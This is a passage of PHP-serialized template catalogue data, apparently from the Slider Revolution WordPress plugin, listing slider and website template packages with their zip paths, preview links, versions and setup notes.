target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:311;a:25:{s:2:\"id\";s:3:\"327\";s:5:\"title\";s:19:\"App Studio Services\";s:5:\"alias\";s:19:\"App-Studio-Services\";s:3:\"zip\";s:29:\"packs/App-Studio-Services.zip\";s:3:\"uid\";s:32:\"5df7776271ec69d2f9edaa6b842715a9\";s:3:\"img\";s:30:\"App-Studio-Services/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:312;a:25:{s:2:\"id\";s:3:\"328\";s:5:\"title\";s:16:\"App Studio About\";s:5:\"alias\";s:16:\"App-Studio-About\";s:3:\"zip\";s:26:\"packs/App-Studio-About.zip\";s:3:\"uid\";s:32:\"af8b84dc116c629df7bd89fc69271a2e\";s:3:\"img\";s:27:\"App-Studio-About/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:313;a:25:{s:2:\"id\";s:3:\"329\";s:5:\"title\";s:19:\"App Studio Contacts\";s:5:\"alias\";s:19:\"App-Studio-Contacts\";s:3:\"zip\";s:29:\"packs/App-Studio-Contacts.zip\";s:3:\"uid\";s:32:\"afbbd2214c983d314f3215a00db9198d\";s:3:\"img\";s:30:\"App-Studio-Contacts/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/app-studio-website/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:149:\"<span class=\"ttm_content\">A modern one-page presentation website to present your mobile app development team.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:10:\"App Studio\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"24\";s:9:\"installed\";b:0;}i:314;a:22:{s:2:\"id\";s:3:\"330\";s:5:\"title\";s:14:\"Cube Animation\";s:5:\"alias\";s:14:\"cube-animation\";s:3:\"zip\";s:18:\"cube-animation.zip\";s:3:\"uid\";s:32:\"c03dd3cfc60479dfc6d79ddb64fa0ec5\";s:3:\"img\";s:25:\"cube-animation/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/cube-animation-slider-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">A modern slider with text elements, cube animations and a striking call to action button.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:315;a:25:{s:2:\"id\";s:3:\"331\";s:5:\"title\";s:13:\"Basic Website\";s:5:\"alias\";s:13:\"basic-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:21:\"basic-website-package\";s:3:\"img\";s:26:\"packages/basic_package.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:316;a:25:{s:2:\"id\";s:3:\"332\";s:5:\"title\";s:10:\"Basic Menu\";s:5:\"alias\";s:10:\"basic-menu\";s:3:\"zip\";s:20:\"packs/basic-menu.zip\";s:3:\"uid\";s:32:\"39277f53b2cb5ac644a1649b47c37270\";s:3:\"img\";s:21:\"basic-menu/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:317;a:25:{s:2:\"id\";s:3:\"333\";s:5:\"title\";s:12:\"Basic Header\";s:5:\"alias\";s:12:\"basic-header\";s:3:\"zip\";s:22:\"packs/basic-header.zip\";s:3:\"uid\";s:32:\"ad7a32dbccb0bdf9de64cf2adfa950a2\";s:3:\"img\";s:23:\"basic-header/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:318;a:25:{s:2:\"id\";s:3:\"334\";s:5:\"title\";s:13:\"Basic Content\";s:5:\"alias\";s:13:\"basic-content\";s:3:\"zip\";s:23:\"packs/basic-content.zip\";s:3:\"uid\";s:32:\"0b12f3b183a3c8206e3a7b28d2d93108\";s:3:\"img\";s:24:\"basic-content/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:319;a:25:{s:2:\"id\";s:3:\"335\";s:5:\"title\";s:14:\"Basic Carousel\";s:5:\"alias\";s:14:\"basic-carousel\";s:3:\"zip\";s:24:\"packs/basic-carousel.zip\";s:3:\"uid\";s:32:\"e4abb5c6d5cf914530575a982d3dfc14\";s:3:\"img\";s:25:\"basic-carousel/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:8:\"carousel\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:320;a:25:{s:2:\"id\";s:3:\"336\";s:5:\"title\";s:13:\"Basic Callout\";s:5:\"alias\";s:13:\"basic-callout\";s:3:\"zip\";s:23:\"packs/basic-callout.zip\";s:3:\"uid\";s:32:\"2ccc208b9322f5435d0f4ff64c6d9dab\";s:3:\"img\";s:24:\"basic-callout/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:321;a:25:{s:2:\"id\";s:3:\"337\";s:5:\"title\";s:10:\"Basic Grid\";s:5:\"alias\";s:10:\"basic-grid\";s:3:\"zip\";s:20:\"packs/basic-grid.zip\";s:3:\"uid\";s:32:\"3cb4b41d2992eba012921b8fb7c96daa\";s:3:\"img\";s:21:\"basic-grid/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:322;a:25:{s:2:\"id\";s:3:\"338\";s:5:\"title\";s:17:\"Basic Video Block\";s:5:\"alias\";s:17:\"basic-video-block\";s:3:\"zip\";s:27:\"packs/basic-video-block.zip\";s:3:\"uid\";s:32:\"e7c1d42b21819741f3e72c1325dae5ed\";s:3:\"img\";s:28:\"basic-video-block/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:323;a:25:{s:2:\"id\";s:3:\"339\";s:5:\"title\";s:12:\"Basic Footer\";s:5:\"alias\";s:12:\"basic-footer\";s:3:\"zip\";s:22:\"packs/basic-footer.zip\";s:3:\"uid\";s:32:\"ed8f6a554775ebace558af2f4f2dcbac\";s:3:\"img\";s:23:\"basic-footer/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:324;a:25:{s:2:\"id\";s:3:\"340\";s:5:\"title\";s:14:\"Basic Lightbox\";s:5:\"alias\";s:14:\"basic-lightbox\";s:3:\"zip\";s:24:\"packs/basic-lightbox.zip\";s:3:\"uid\";s:32:\"e4b025b300b1a8f417d04eb80113fac2\";s:3:\"img\";s:25:\"basic-lightbox/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/basic-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The Basic Website template is a minimal one-page website with all the essential modules. Usable and quickly customizable.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Basic Website\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"25\";s:9:\"installed\";b:0;}i:325;a:22:{s:2:\"id\";s:3:\"341\";s:5:\"title\";s:13:\"Nature Slider\";s:5:\"alias\";s:13:\"nature-slider\";s:3:\"zip\";s:17:\"nature-slider.zip\";s:3:\"uid\";s:32:\"eef1a4584ec1c3b8c26c305cca44e805\";s:3:\"img\";s:24:\"nature-slider/slide1.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/nature-explorer-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:151:\"<span class=\"ttm_content\">The Nature Explorer Slider Template uses the Distortion and Particle Effects Add-Ons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:356:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-liquideffect-addon\\/revslider-liquideffect-addon.php\",\"name\":\"Distortion Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:326;a:22:{s:2:\"id\";s:3:\"342\";s:5:\"title\";s:11:\"Art Gallery\";s:5:\"alias\";s:11:\"art-gallery\";s:3:\"zip\";s:15:\"art-gallery.zip\";s:3:\"uid\";s:32:\"b8c5095ae3407337e6e5b2a8515e7d6e\";s:3:\"img\";s:22:\"art-gallery/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/art-gallery-slider-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:6:\"6.2.22\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:145:\"<span class=\"ttm_content\">A modern slider with large, geometric elements and interesting mask animations.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:327;a:25:{s:2:\"id\";s:3:\"343\";s:5:\"title\";s:20:\"Construction Company\";s:5:\"alias\";s:28:\"construction-company-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:36:\"construction-company-website-package\";s:3:\"img\";s:33:\"packages/construction_package.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:163:\"[{\"path\":\"revslider-revealer-addon\\/revslider-revealer-addon.php\",\"name\":\"Reveal AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:328;a:25:{s:2:\"id\";s:3:\"344\";s:5:\"title\";s:19:\"Construction Header\";s:5:\"alias\";s:19:\"Construction-Header\";s:3:\"zip\";s:29:\"packs/Construction-Header.zip\";s:3:\"uid\";s:32:\"5c77de774b8f5487c1276c4a7b3dc80c\";s:3:\"img\";s:30:\"Construction-Header/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction 